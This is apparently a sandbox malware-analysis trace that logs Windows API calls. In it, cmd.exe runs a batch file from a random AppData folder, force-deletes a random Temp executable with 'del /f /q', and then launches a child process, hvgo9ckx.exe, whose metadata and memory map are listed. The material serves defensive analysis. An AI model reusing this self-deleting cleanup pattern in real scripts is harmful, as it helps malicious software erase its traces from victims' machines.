SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.017] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n") returned 62 [0120.017] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.017] GetFileType (hFile=0x54) returned 0x1 [0120.017] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.017] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.019] _tell (_FileHandle=3) returned 83 [0120.019] _close (_FileHandle=3) returned 0 [0120.019] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af034 | out: _Buffer="\r\n") returned 2 [0120.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.019] GetFileType (hFile=0x7) returned 0x2 [0120.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.020] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff4 | out: lpMode=0x2aeff4) returned 1 [0120.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.020] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af020, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af020*=0x2) returned 1 [0120.027] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.027] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.027] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2af030 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.027] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x2af030 | out: _Buffer=">") returned 1 [0120.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.027] GetFileType (hFile=0x7) returned 0x2 [0120.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff8 | out: lpMode=0x2aeff8) returned 1 [0120.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.028] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x2af024, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x2af024*=0x19) returned 1 [0120.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.028] GetFileType (hFile=0x7) returned 0x2 [0120.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af27c | out: lpMode=0x2af27c) returned 1 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2af2a8, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x2af2a8*=0x3) returned 1 [0120.029] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2af2b4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" ") returned 58 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.029] GetFileType (hFile=0x7) returned 0x2 [0120.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.029] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af274 | out: lpMode=0x2af274) returned 1 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x2af2a0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2a0*=0x3a) returned 1 [0120.029] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af2d4 | out: _Buffer="\r\n") returned 2 [0120.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.030] GetFileType (hFile=0x7) returned 0x2 [0120.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af294 | out: lpMode=0x2af294) returned 1 [0120.030] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.030] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af2c0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2c0*=0x2) returned 1 [0120.030] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.030] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.030] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.030] GetConsoleTitleW (in: lpConsoleTitle=0x2aee44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.031] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2adec0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.031] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.031] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x2020 [0120.031] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.031] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.031] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x2020 [0120.032] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0x410aa8 [0120.032] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 1 [0120.032] FindNextFileW (in: hFindFile=0x410aa8, lpFindFileData=0x430554 | out: lpFindFileData=0x430554) returned 0 [0120.033] GetLastError () returned 0x12 [0120.033] FindClose (in: hFindFile=0x410aa8 | out: hFindFile=0x410aa8) returned 1 [0120.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.033] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.034] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.034] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.034] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.034] SetConsoleInputExeNameW () returned 0x1 [0120.034] GetConsoleOutputCP () returned 0x1b5 [0120.034] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.034] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.034] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.034] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.034] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.035] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.035] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x3e, lpOverlapped=0x0) returned 1 [0120.035] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\"\r\n") returned 62 [0120.035] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] GetFileType (hFile=0x54) returned 0x1 [0120.035] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.035] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.036] _tell (_FileHandle=3) returned 145 [0120.036] _close (_FileHandle=3) returned 0 [0120.037] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af034 | out: _Buffer="\r\n") returned 2 [0120.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.037] GetFileType (hFile=0x7) returned 0x2 [0120.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.037] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff4 | out: lpMode=0x2aeff4) returned 1 [0120.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af020, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af020*=0x2) returned 1 [0120.037] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.037] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2af030 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.037] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x2af030 | out: _Buffer=">") returned 1 [0120.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.038] GetFileType (hFile=0x7) returned 0x2 [0120.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.038] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff8 | out: lpMode=0x2aeff8) returned 1 [0120.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.038] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x2af024, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x2af024*=0x19) returned 1 [0120.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.038] GetFileType (hFile=0x7) returned 0x2 [0120.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.038] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af27c | out: lpMode=0x2af27c) returned 1 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2af2a8, lpReserved=0x0 | out: lpBuffer=0x42f008*, lpNumberOfCharsWritten=0x2af2a8*=0x3) returned 1 [0120.039] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2af2b4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" ") returned 58 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] GetFileType (hFile=0x7) returned 0x2 [0120.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af274 | out: lpMode=0x2af274) returned 1 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x2af2a0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2a0*=0x3a) returned 1 [0120.039] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af2d4 | out: _Buffer="\r\n") returned 2 [0120.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.039] GetFileType (hFile=0x7) returned 0x2 [0120.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af294 | out: lpMode=0x2af294) returned 1 [0120.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af2c0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2c0*=0x2) returned 1 [0120.040] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.040] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.040] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.040] GetConsoleTitleW (in: lpConsoleTitle=0x2aee44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.040] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2adec0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2adebc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.041] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.041] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0xffffffff [0120.041] GetLastError () returned 0x2 [0120.041] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2=".") returned 52 [0120.041] _wcsicmp (_String1="bkM66bYk.exe", _String2="..") returned 52 [0120.041] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0xffffffff [0120.041] GetLastError () returned 0x2 [0120.041] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", fInfoLevelId=0x0, lpFindFileData=0x430554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x430554) returned 0xffffffff [0120.041] GetLastError () returned 0x2 [0120.041] _get_osfhandle (_FileHandle=2) returned 0xb [0120.041] GetFileType (hFile=0xb) returned 0x2 [0120.041] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0120.041] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ae8bc | out: lpMode=0x2ae8bc) returned 1 [0120.042] _get_osfhandle (_FileHandle=2) returned 0xb [0120.042] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ae8f0 | out: lpConsoleScreenBufferInfo=0x2ae8f0) returned 1 [0120.042] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0120.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.042] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.042] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.042] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.043] SetConsoleInputExeNameW () returned 0x1 [0120.043] GetConsoleOutputCP () returned 0x1b5 [0120.043] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.043] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.043] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.043] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.043] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x0, lpOverlapped=0x0) returned 1 [0120.043] GetLastError () returned 0x0 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] GetFileType (hFile=0x54) returned 0x1 [0120.043] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.043] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.044] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.044] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.044] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af244, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af244*=0x0, lpOverlapped=0x0) returned 1 [0120.044] GetLastError () returned 0x0 [0120.044] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.044] GetFileType (hFile=0x54) returned 0x1 [0120.044] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.044] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0120.044] longjmp () [0120.044] _tell (_FileHandle=3) returned 145 [0120.044] _close (_FileHandle=3) returned 0 [0120.044] CmdBatNotification () returned 0x0 [0120.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.044] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.045] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.045] SetConsoleInputExeNameW () returned 0x1 [0120.045] GetConsoleOutputCP () returned 0x1b5 [0120.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.045] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.045] exit (_Code=0) Process: id = "48" image_name = "hvgo9ckx.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe" page_root = "0x7ea16720" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xd68" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7524 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7525 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7526 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "hvgo9ckx.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe") Region: id = 7527 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7528 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7529 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7530 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7531 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7571 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7572 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7573 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7574 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 7575 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7576 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7577 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7578 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7579 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7580 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7581 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7582 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7583 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7584 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7585 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7586 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7587 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7588 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 7589 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 7590 start_va = 0x11f0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 7715 start_va = 0x741e0000 end_va = 0x7421ffff 